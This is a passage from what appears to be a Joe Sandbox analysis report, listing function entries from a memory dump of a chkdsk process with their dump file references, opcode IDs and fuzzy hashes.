                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d1fbd05e1a1f8cb43af69c853f4845d68bc2f737276326ed8fb945d300085aa8
                                                                                                                    • Instruction ID: 169d1e8e6514ccde0b40127359264fbee2af340222ee1093a3114019e8c67380
                                                                                                                    • Opcode Fuzzy Hash: d1fbd05e1a1f8cb43af69c853f4845d68bc2f737276326ed8fb945d300085aa8
                                                                                                                    • Instruction Fuzzy Hash: 20118E76A00714ABDB21EF5AD980B6EF7B8FF48710F550455DD02E7244EB70EE058BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587E45E Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                                    • Instruction ID: 2a08dcf84944afa32c9a192877059c65474e9a5c4ca2ab5f22d07be4fb95354c
                                                                                                                    • Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                                    • Instruction Fuzzy Hash: CC11E132A05A898BE7228738C898B6577DDFF41B68F1904E0EE01DB792DB68DC81C755
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05883740 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f9a40b4ef4c554376f3c303b6e59df35d40baefdfe4691052a0a75e801e471da
                                                                                                                    • Instruction ID: 3775680b0d812f98ba4bee7141d77f35d6e6d790873bd5384aecc417c8ad5547
                                                                                                                    • Opcode Fuzzy Hash: f9a40b4ef4c554376f3c303b6e59df35d40baefdfe4691052a0a75e801e471da
                                                                                                                    • Instruction Fuzzy Hash: 151137B961424ADFD744DF18D840AA5BBE5FB49714B4486AAE848CB311DB35EC80CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587F1F0 Relevance: .1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81b75f0775b95b0cda498bfd0e97602f8dc120ddc798a30a1aed4a41054cf89e
                                                                                                                    • Instruction ID: 4d7d50e4081a60713d75f5a9a8a28822cf2bf3e2a86eb3f5928a82000951fd14
                                                                                                                    • Opcode Fuzzy Hash: 81b75f0775b95b0cda498bfd0e97602f8dc120ddc798a30a1aed4a41054cf89e
                                                                                                                    • Instruction Fuzzy Hash: 5111C2767007489BDB20DF69C844BAAB7A8BF45604F140475EE05EB752DA75DD01C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05856179 Relevance: .1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8b76e9d17bc6bf281d8283c3fa3eaa9aa0aa56ffd20120a3fd8956994f279e04
                                                                                                                    • Instruction ID: 374465978448e0bfbc8ea2a494dff57561ddcaf64715eeda04d5f517af7535e7
                                                                                                                    • Opcode Fuzzy Hash: 8b76e9d17bc6bf281d8283c3fa3eaa9aa0aa56ffd20120a3fd8956994f279e04
                                                                                                                    • Instruction Fuzzy Hash: 85114F71641318ABEF35EB28CC45FE972B5BB04710F5441D4AA15EA1D0DB309E85CF8A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DC490 Relevance: .0, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eb78c58e76cdb7564130f189103bab512ba7e517c788d749a857aa73a086e186
                                                                                                                    • Instruction ID: d90b1d88f84a28ebc1c77e368804c8fa708db02ee750cb9afda2459c88f00cee
                                                                                                                    • Opcode Fuzzy Hash: eb78c58e76cdb7564130f189103bab512ba7e517c788d749a857aa73a086e186
                                                                                                                    • Instruction Fuzzy Hash: ED1118B5A00209AFCB04DFADD545AAEBBF8FF48200F14406AF905E7341D674EE01CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588E4EF Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b8ccbe7e8c9f40b3b28dca0542c76617cbe9f886f0fbf097e86c321c10a0fc2
                                                                                                                    • Instruction ID: 84f6f87e013a34eb905544ce6285b01ddd8a66e6d22ee13f277fa7ea388d88db
                                                                                                                    • Opcode Fuzzy Hash: 6b8ccbe7e8c9f40b3b28dca0542c76617cbe9f886f0fbf097e86c321c10a0fc2
                                                                                                                    • Instruction Fuzzy Hash: CB0184B1300744BFD311AB6DCD88E57B7ACFB85754B000669B906C3960DB74EC11CAA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F68C Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11e51d0764bcea238fdf771c763e27c90b74acfb69953e2211718ed4929cbc53
                                                                                                                    • Instruction ID: e17483f83110c26a2ba0713eb41dc3aaad502a39733b3aac06923d5c5b387f32
                                                                                                                    • Opcode Fuzzy Hash: 11e51d0764bcea238fdf771c763e27c90b74acfb69953e2211718ed4929cbc53
                                                                                                                    • Instruction Fuzzy Hash: E611AD71A01348AFCB14DFA9C845EAEBBF8EF44700F14446AB901EB381DA74DE00CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892010 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5dff17d181afbec980a65b4c2a84be4700afa0b7bbe1d477ccd065ad903f435b
                                                                                                                    • Instruction ID: 60368787cdb2537445a5463d55842f02dcb2eaa613cbfbe81375279a5d0d746b
                                                                                                                    • Opcode Fuzzy Hash: 5dff17d181afbec980a65b4c2a84be4700afa0b7bbe1d477ccd065ad903f435b
                                                                                                                    • Instruction Fuzzy Hash: 86115B75A01208AFDF05DFA8C855EAE7BB5BB45704F104099FD12DB280DA35ED15CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DC5FC Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0e31cbb65ebad2a6e15f4a4ac13fda5b31260c740ee7c6000c8f43066d37bafc
                                                                                                                    • Instruction ID: 12ecb075654eeb87a3624d99b44dd8f1093355797f8901ca291c832a6baa4a1c
                                                                                                                    • Opcode Fuzzy Hash: 0e31cbb65ebad2a6e15f4a4ac13fda5b31260c740ee7c6000c8f43066d37bafc
                                                                                                                    • Instruction Fuzzy Hash: F51179B16093049FC704DF69D445A5BBBE8EF88710F00895EF959D7391E630ED00CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DC691 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a5e210523bcd364e62f0ce282b6b225271d437a8d9b34f834163f1b4138f424
                                                                                                                    • Instruction ID: 34038edec88f10bf3e003f7914fb91a0bbb17ba49213d4c6fe1414f11ae334b1
                                                                                                                    • Opcode Fuzzy Hash: 5a5e210523bcd364e62f0ce282b6b225271d437a8d9b34f834163f1b4138f424
                                                                                                                    • Instruction Fuzzy Hash: 291157B56093049FC704DF6DD445A4ABBE8EF88710F00891EF958D7390EA30ED00CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05924600 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                                    • Instruction ID: a388c04cf64c914e7508d80667eee4582b73388aba4b36d1abc4e8b981fe6738
                                                                                                                    • Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                                    • Instruction Fuzzy Hash: D001F7322047119FDB25DB69D844F57B3EAFFC5200F088859E55BCB654DAB0F890C790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05849303 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                    • Instruction ID: 2970b764704d6049a4a2ec6aee1d7638201f9b3f4282670c49c8193ef35c0c1d
                                                                                                                    • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                    • Instruction Fuzzy Hash: C0118B32550B059FD7319F15C880B22B3E1FB45B62F19886DED8A8B4A2D774EC80CF10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F582 Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 98fd299bcfe874ec20cbfb6c9d53576ab32f0550be2241406182c6c489d82199
                                                                                                                    • Instruction ID: 895a06693191050754f40ec323758dac9f3827cc497ebb9d34e9479e20af3d06
                                                                                                                    • Opcode Fuzzy Hash: 98fd299bcfe874ec20cbfb6c9d53576ab32f0550be2241406182c6c489d82199
                                                                                                                    • Instruction Fuzzy Hash: AB017175A11308AFDB14DFA9D84AFAEBBB8EF44714F044466B901EB380DA74DE01CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F4FD Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 117adea9bce04cd665078c11f5d412e46ed91daf0dcf1d2432882d88a133ecc6
                                                                                                                    • Instruction ID: 9f97fd6d2df29e829ef886869171a2086cbc15fc2b68e71fc6f919cb4da8132d
                                                                                                                    • Opcode Fuzzy Hash: 117adea9bce04cd665078c11f5d412e46ed91daf0dcf1d2432882d88a133ecc6
                                                                                                                    • Instruction Fuzzy Hash: 84019E71A01308AFCB14DFA9D84AEAEBBB8EF44710F044466B811EB280DA74DE01CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F478 Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 942c389dea2810e532d202f8f0b44966e3cc3f4772f087100fc0fd85e1e46776
                                                                                                                    • Instruction ID: 3716c38e252c377fdbbb8e5b6c96ac10381819b439473c170e1633f006eac53a
                                                                                                                    • Opcode Fuzzy Hash: 942c389dea2810e532d202f8f0b44966e3cc3f4772f087100fc0fd85e1e46776
                                                                                                                    • Instruction Fuzzy Hash: 4E017175A01348AFDB14EFA9D849EAEBBB8EF44710F044466F901EB381DA74DE01CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F607 Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 735568dda211572f3030651e2e0bfb59470e268c39b1ed2c8f5edb2696975891
                                                                                                                    • Instruction ID: 9fdb6f224848303dedc82b2fc30a844848b546e2851d1d914bb148d31bb2286e
                                                                                                                    • Opcode Fuzzy Hash: 735568dda211572f3030651e2e0bfb59470e268c39b1ed2c8f5edb2696975891
                                                                                                                    • Instruction Fuzzy Hash: 3E017175A01308AFDB14DFA9D84AEAEBBB8FF45714F044466B901EB380DA74DE01CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F13E Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3afef085fea98e7b2fbe3fa3a6f3f0f81e40c8ae98b17083059627edf1887bcc
                                                                                                                    • Instruction ID: b39488e9cf62d6d93a73b250f66c79e1b43188eb2c83097619b88103293e9545
                                                                                                                    • Opcode Fuzzy Hash: 3afef085fea98e7b2fbe3fa3a6f3f0f81e40c8ae98b17083059627edf1887bcc
                                                                                                                    • Instruction Fuzzy Hash: 04015E75A01348AFDB14EFA9D845EAEBBF8EF45704F044466B900EB281DA74DE01CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588D0F0 Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                                                    • Instruction ID: 21051926c1fa2b1b288b7fac391d2db2b4526ffbb0999523456453107a35b535
                                                                                                                    • Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                                                    • Instruction Fuzzy Hash: 7301D436786254DBDB11BA18C804F39B39BEFC0A64F144199EE15CF2C2DB74ED018792
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588415F Relevance: .0, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1e39d1d9f7dbf70b794822e117388cd292f95a69b95b6d8405ec2f476060823f
                                                                                                                    • Instruction ID: cecf82560fea1f0d2798882ae521ffac0048e70dff3a3a489228b6b28a33f9ee
                                                                                                                    • Opcode Fuzzy Hash: 1e39d1d9f7dbf70b794822e117388cd292f95a69b95b6d8405ec2f476060823f
                                                                                                                    • Instruction Fuzzy Hash: 79018F3F2082129BCB25EF7D9618971BBE9FB5A218704016DE84AD3B65D632ED01CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058524A2 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b37ff12558936fe754c6790ade51dbd2e37fb3001d4104381f330d923f131915
                                                                                                                    • Instruction ID: c065002ddd110257cd8f744928cdd8d9d9b2ecca235b6a0b68561da879aaabd0
                                                                                                                    • Opcode Fuzzy Hash: b37ff12558936fe754c6790ade51dbd2e37fb3001d4104381f330d923f131915
                                                                                                                    • Instruction Fuzzy Hash: 9EF0F432741B60ABD336DF5A8C44F57BAA9EBC4BA0F108428BE06D7240CA30DC01D7A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F38A Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd688274b6e9004ede0e7f68daef6ee38346c4ef1383c765afb93d0ff7ae0a9b
                                                                                                                    • Instruction ID: dbfaa2813ec851c6559b5d8ea4eb54f08dd8af171f3cebbb805b7c99274c0dd9
                                                                                                                    • Opcode Fuzzy Hash: cd688274b6e9004ede0e7f68daef6ee38346c4ef1383c765afb93d0ff7ae0a9b
                                                                                                                    • Instruction Fuzzy Hash: 19017175A01318EFDB14DBA9D849EAEBBB8EF44704F044466B901EB281DA74DA01CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 059251B6 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
